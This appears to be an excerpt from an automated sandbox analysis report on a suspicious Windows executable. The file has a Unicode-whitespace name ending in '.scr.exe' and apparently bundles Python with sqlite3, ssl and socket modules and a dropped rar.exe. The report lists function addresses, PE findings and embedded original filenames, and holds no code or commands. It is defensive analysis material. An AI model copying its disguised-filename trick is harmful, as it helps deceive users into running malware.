Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EC5468	68_2_00007FF7F7EC5468
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EAD458	68_2_00007FF7F7EAD458
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EAC3E0	68_2_00007FF7F7EAC3E0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EB0374	68_2_00007FF7F7EB0374
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E92360	68_2_00007FF7F7E92360
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7ED832C	68_2_00007FF7F7ED832C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7ED1314	68_2_00007FF7F7ED1314
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E842E0	68_2_00007FF7F7E842E0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E9D2C0	68_2_00007FF7F7E9D2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EC02A4	68_2_00007FF7F7EC02A4
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7ED2268	68_2_00007FF7F7ED2268
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E8F24C	68_2_00007FF7F7E8F24C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EA7244	68_2_00007FF7F7EA7244
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E9E21C	68_2_00007FF7F7E9E21C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EE41CC	68_2_00007FF7F7EE41CC
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EC81CC	68_2_00007FF7F7EC81CC
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EC2164	68_2_00007FF7F7EC2164
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EA0104	68_2_00007FF7F7EA0104
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EE00F0	68_2_00007FF7F7EE00F0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EB0074	68_2_00007FF7F7EB0074
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EAC05C	68_2_00007FF7F7EAC05C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EB8040	68_2_00007FF7F7EB8040
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E93030	68_2_00007FF7F7E93030
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EBC00C	68_2_00007FF7F7EBC00C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EC4FE8	68_2_00007FF7F7EC4FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EEDFD8	68_2_00007FF7F7EEDFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EEAF90	68_2_00007FF7F7EEAF90
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EB5F4C	68_2_00007FF7F7EB5F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EBAF0C	68_2_00007FF7F7EBAF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E89EFC	68_2_00007FF7F7E89EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7ECEEA4	68_2_00007FF7F7ECEEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E8CE84	68_2_00007FF7F7E8CE84
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EDFE74	68_2_00007FF7F7EDFE74
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E98E68	68_2_00007FF7F7E98E68
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7ECAE50	68_2_00007FF7F7ECAE50
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E8EE08	68_2_00007FF7F7E8EE08
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E91E04	68_2_00007FF7F7E91E04
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7ED1DCC	68_2_00007FF7F7ED1DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EC9D74	68_2_00007FF7F7EC9D74
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EB0D20	68_2_00007FF7F7EB0D20
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7ED6D0C	68_2_00007FF7F7ED6D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EA9D0C	68_2_00007FF7F7EA9D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E8DD04	68_2_00007FF7F7E8DD04
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EC5C8C	68_2_00007FF7F7EC5C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E98C30	68_2_00007FF7F7E98C30
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7ED9B98	68_2_00007FF7F7ED9B98
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EC4B38	68_2_00007FF7F7EC4B38
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E8CB14	68_2_00007FF7F7E8CB14
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EEAAC0	68_2_00007FF7F7EEAAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EC5A70	68_2_00007FF7F7EC5A70
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EBFA6C	68_2_00007FF7F7EBFA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EC69FD	68_2_00007FF7F7EC69FD
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E849B8	68_2_00007FF7F7E849B8
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EAD97C	68_2_00007FF7F7EAD97C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EBD91C	68_2_00007FF7F7EBD91C

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: String function: 00007FF8A86EA550 appears 165 times
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: String function: 00007FF8A86E94B0 appears 134 times
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: String function: 00007FF8A8710F90 appears 34 times
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: String function: 00007FF73AE12B30 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: String function: 00007FF7F7E98444 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: String function: 00007FF7F7EC49F4 appears 53 times

Source: #U202f#U202f#U2005#U00a0.scr.exe

Static PE information: invalid certificate

Source: rar.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found

Source: #U202f#U202f#U2005#U00a0.scr.exe	Binary or memory string: OriginalFilename vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037933852.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034682833.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035401905.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038915705.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042526776.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034476266.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035945476.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036561449.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037632410.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037785909.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035844726.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036690975.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037437086.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037218357.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038015630.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037713341.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037539805.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037350742.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035749504.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036215404.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034770359.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038812496.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036953380.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037858907.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035650264.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038238108.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038322803.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038599367.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034582747.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038707513.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000000.2032418452.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMDMAgentj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038502657.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036066040.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035542606.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038406109.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037034859.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036777921.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038117369.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036870702.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037125137.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340140316.00007FF8A9398000.00000004.00000001.01000000.00000011.sdmp	Binary or memory string: OriginalFilenamelibsslH vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343212572.00007FF8B984C000.00000004.00000001.01000000.0000000E.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342965199.00007FF8B93D8000.00000004.00000001.01000000.0000000D.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341048034.00007FF8B8CC3000.00000004.00000001.01000000.00000012.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336517828.00007FF8A86A9000.00000004.00000001.01000000.00000010.sdmp	Binary or memory string: OriginalFilenamelibcryptoH vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340442986.00007FF8B7EEE000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340792166.00007FF8B8B42000.00000004.00000001.01000000.0000000F.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339600779.00007FF8A8F2A000.00000004.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamepython312.dll. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342336186.00007FF8B9094000.00000004.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341984089.00007FF8B906C000.00000004.00000001.01000000.00000013.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2333652744.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMDMAgentj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341701034.00007FF8B8F9C000.00000004.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334206076.00007FF8A81AA000.00000004.00000001.01000000.00000014.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341319253.00007FF8B8CF3000.00000004.00000001.01000000.0000000B.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343410682.00007FF8B9F78000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
